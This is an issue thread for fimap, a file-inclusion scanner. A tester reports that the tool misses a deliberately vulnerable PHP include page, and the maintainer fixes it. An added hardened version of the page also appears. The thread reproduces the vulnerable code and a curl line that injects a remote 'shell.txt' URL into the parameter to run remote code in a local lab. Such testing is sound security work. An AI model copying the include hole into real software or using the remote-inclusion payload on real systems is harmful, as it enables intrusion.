kurobeats / fimap

fimap is a little python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps.
GNU General Public License v2.0

fimap does not detect vulnerabilities #81

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
On which URL does this error occur? (Important!)

Tested URL: http://127.0.0.1/vulnerable.php?COLOR=red

vulnerable.php contents:

<?php
   if ( isset( $_GET['COLOR'] ) ) {
      include( $_GET['COLOR'] . '.php' );
   }
?>
<form method="get">
   <select name="COLOR">
      <option value="red">red</option>
      <option value="blue">blue</option>
   </select>
   <input type="submit">
</form>

Which version of fimap are you using? (You can see that in the very first line)

v.1.00_svn

On what operating system?

Kali Linux

Please provide any additional information below.

php.ini has the following set and testing the vulnerable code manually works:

allow_url_include = On

For any URL tested, the results are always the same:

SingleScan is testing URL: 'http://127.0.0.1/vulnerable.php?COLOR=red'
[14:21:07] [OUT] Inspecting URL 'http://127.0.0.1/vulnerable.php?COLOR=red'...
[14:21:07] [INFO] Fiddling around with URL...
Target URL isn't affected by any file inclusion bug :(

Original issue reported on code.google.com by doo...@kali.org on 24 Mar 2015 at 4:17
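
A hardened counterpart to the vulnerable.php in the report above, added here as an example; it is not part of the original issue or of fimap. It assumes PHP 7.1 or later and a hypothetical `colors` directory beside the script that holds red.php and blue.php; `resolve_color_file` and `COLOR_FILES` are names made up for this sketch.

```php
<?php
// Added example: the COLOR value is only ever used as a lookup key,
// so request data never becomes part of the path passed to include.
const COLOR_FILES = [
    'red'  => 'red.php',
    'blue' => 'blue.php',
];

// Returns the absolute path for an allowed colour, or null if the value
// is unknown, the file is missing, or it resolves outside $baseDir.
function resolve_color_file(?string $color, string $baseDir): ?string
{
    if ($color === null || !array_key_exists($color, COLOR_FILES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . COLOR_FILES[$color]);
    // realpath() returns false for missing files; the prefix check rejects
    // symlinks that point outside the base directory.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// A non-string value (e.g. COLOR[]=x) is treated as absent.
$color = isset($_GET['COLOR']) && is_string($_GET['COLOR']) ? $_GET['COLOR'] : null;
$file  = resolve_color_file($color, __DIR__ . '/colors');  // assumed directory

if ($color !== null && $file === null) {
    http_response_code(400);
    // json_encode() escapes control characters, so the value cannot forge log lines.
    error_log('vulnerable.php: rejected COLOR=' . json_encode($color));
} elseif ($file !== null) {
    include $file;
}
?>
<form method="get">
   <select name="COLOR">
      <option value="red">red</option>
      <option value="blue">blue</option>
   </select>
   <input type="submit">
</form>
```

Setting `allow_url_include = Off` in php.ini (the reverse of the test configuration in the report) is a second layer on top of this, and the rejected-value log line gives a scanner run against the page something to be detected by.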

GoogleCodeExporter commented 9 years ago
Hi,

Does this resolve your issue?
https://code.google.com/p/fimap/wiki/BlindMode

If not please leave another comment and I will check it more deeply.

-imax.

Original comment by fimap....@gmail.com on 24 Mar 2015 at 5:58

GoogleCodeExporter commented 9 years ago
Thanks for the reply. Unfortunately, it's still not behaving properly and I've
pasted the output below for fimap and doing it manually with curl.

root@kali:~/fimap/src# ./fimap.py -u "http://127.0.0.1/vulnerable.php?COLOR=red" -b
fimap v.1.00_svn (My life for Aiur)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

Blind FI-error checking enabled.
SingleScan is testing URL: 'http://127.0.0.1/vulnerable.php?COLOR=red'
[11:30:43] [OUT] Inspecting URL 'http://127.0.0.1/vulnerable.php?COLOR=red'...
[11:30:43] [INFO] Fiddling around with URL...
[11:30:43] [INFO] Sniper failed. Going blind...
Target URL isn't affected by any file inclusion bug :(

root@kali:~/fimap/src# curl 'http://127.0.0.1/vulnerable.php?COLOR=http://172.16.206.148/shell.txt?'
remote shell inside!
root@kali:~/fimap/src#

Thanks!
dookie

Original comment by doo...@kali.org on 25 Mar 2015 at 11:35

GoogleCodeExporter commented 9 years ago
This issue was closed by revision r333.

Original comment by fimap....@gmail.com on 25 Mar 2015 at 3:15

GoogleCodeExporter commented 9 years ago
Hi Dookie,

Thank you a lot for your report!
I could reproduce this error and fix it.

Please checkout the newest version and let me know if this issue is history.

Again, thank you a lot for your time to report. :)
-imax

Original comment by fimap....@gmail.com on 25 Mar 2015 at 3:18

GoogleCodeExporter commented 9 years ago
Tested and confirmed working. Thanks for the quick fix!

dookie

Original comment by doo...@kali.org on 25 Mar 2015 at 3:25